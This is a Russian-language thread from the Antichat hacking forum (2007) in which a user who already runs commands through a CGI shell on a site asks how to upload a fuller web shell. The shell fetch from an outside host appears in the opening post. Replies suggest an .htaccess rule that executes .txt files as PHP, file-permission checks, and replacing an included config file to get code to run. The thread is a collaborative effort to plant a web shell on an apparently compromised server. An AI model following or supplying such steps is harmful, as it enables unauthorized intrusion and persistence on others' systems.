ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Безопасность > *nix
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Проблемы с заливкой шелла
  #1  
Старый 27.07.2007, 15:29
Аватар для _-Ramos-_
_-Ramos-_
Banned
Регистрация: 04.01.2007
Сообщений: 193
Провел на форуме:
4213286

Репутация: 728
По умолчанию Проблемы с заливкой шелла

Тут такая проблема :
есть шелл site/qwerty.cgi?= , где я после = могу выполнять команды. Я хочу залить более удобный шелл . На сервер можна заливать файлы через fetch.
При выполнении
Цитата:
fetch -o /kyda/zalivaem/shell.php http://site.com/shell.txt
шелл заливается на сервер (в этом я убедился командой ls -al и cat /kyda/zalivaem/shell.php мне выдает исходники шелла), но когда я захожу на ссылку шелла,
то мне выдает ошибку 404 .

как мне залить шелл на сайт ???

P.S: извиняюсь если создал тему не у том розделе

Последний раз редактировалось RAUL07; 27.07.2007 в 15:35..
 
Ответить с цитированием

  #2  
Старый 27.07.2007, 15:36
Аватар для andy13
andy13
Участник форума
Регистрация: 04.02.2007
Сообщений: 120
Провел на форуме:
306837

Репутация: 36
По умолчанию

в другие каталоги заливать пробовал?
 
Ответить с цитированием

  #3  
Старый 27.07.2007, 15:38
Аватар для _-Ramos-_
_-Ramos-_
Banned
Регистрация: 04.01.2007
Сообщений: 193
Провел на форуме:
4213286

Репутация: 728
По умолчанию

для заливки в другие каталоги недостаточно прав
 
Ответить с цитированием

  #4  
Старый 27.07.2007, 15:49
Аватар для andy13
andy13
Участник форума
Регистрация: 04.02.2007
Сообщений: 120
Провел на форуме:
306837

Репутация: 36
По умолчанию

В каталоге, куда заливаешь, есть другие файлы? С каким расширением?
При попытке их посмотреть тоже 404?
Если нет, попробуй так:
cp shell.php shell.txt
и создай .htaccess такого содержания:
AddType application/x-httpd-php .txt
 
Ответить с цитированием

  #5  
Старый 27.07.2007, 15:50
Аватар для Alexsize
Alexsize
Fail
Регистрация: 17.09.2005
Сообщений: 2,242
Провел на форуме:
9089375

Репутация: 4268


По умолчанию

Напиши в ПМ. Попробуем разрулить.
__________________
...
 
Ответить с цитированием

  #6  
Старый 27.07.2007, 15:56
Аватар для groundhog
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549

Репутация: 1318


Отправить сообщение для groundhog с помощью ICQ
По умолчанию

Посмотри на права, какие получаются у шелла после заливки с урлы... Нету прав на выполнение скорее всего... Возможно хитро настроен mod_rewrite...
 
Ответить с цитированием

  #7  
Старый 27.07.2007, 15:59
Аватар для _-Ramos-_
_-Ramos-_
Banned
Регистрация: 04.01.2007
Сообщений: 193
Провел на форуме:
4213286

Репутация: 728
По умолчанию

В каталоге есть еще файлы с расширением .cgi и при их просмотре выдаетс тоже ошибка 404
 
Ответить с цитированием

  #8  
Старый 27.07.2007, 16:24
Аватар для andy13
andy13
Участник форума
Регистрация: 04.02.2007
Сообщений: 120
Провел на форуме:
306837

Репутация: 36
По умолчанию

Код:
#!/path_to_perl/perl
print "Content-type: text/plain\n\n";
print "hello!";
сохраняй как hello.cgi
chmod 755 hello.cgi
На такое тоже ругается?
 
Ответить с цитированием

  #9  
Старый 27.07.2007, 16:44
Аватар для Talisman
Talisman
Постоянный
Регистрация: 22.04.2006
Сообщений: 566
Провел на форуме:
1325772

Репутация: 517


Отправить сообщение для Talisman с помощью ICQ
По умолчанию

там есть файлы типа .htaccess? в предыдущих дирах? посмотри внимательнее в них.
как насчет модификации уже существующих файлов?

Например, у меня прокатывал такой вариант:
самописная ЦМС инклудила файл конфига. я его скопировал с именем config_.php
затем config.php с правильными правами на исполнение переименовал в другое имя и переписал. переименовав config_.php в оригинальный. инклудился он нормально, но вот уже не исполнялся так же как новосозданные файлы
Кста, кто знает, что там за система была заюзана?
 
Ответить с цитированием

  #10  
Старый 27.07.2007, 16:45
Аватар для Alexsize
Alexsize
Fail
Регистрация: 17.09.2005
Сообщений: 2,242
Провел на форуме:
9089375

Репутация: 4268


По умолчанию

Короче тему можно закрывать. Сайт, на который удалось влить шелл не виден из веба. На остальных сайтах сервака нет прав доступа для заливки шелла.
__________________
...

Последний раз редактировалось Alexsize; 29.07.2007 в 19:16..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Проблема с заливкой шелла в Invision Power Board v2.1.7 DeadMeat Форумы 9 24.02.2010 11:48
Помогите с заливкой веб шелла в PunBB alex.off Форумы 4 14.07.2007 00:35
Проблемы с заливкой шелла в ipb anakreon Форумы 8 18.03.2007 15:20
Проблемы с заливкой шелла на phpbb AlexCRC Форумы 8 21.10.2006 17:37
Проблемы с Аничатовскими штучками. temon Болталка 4 27.09.2005 12:52



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ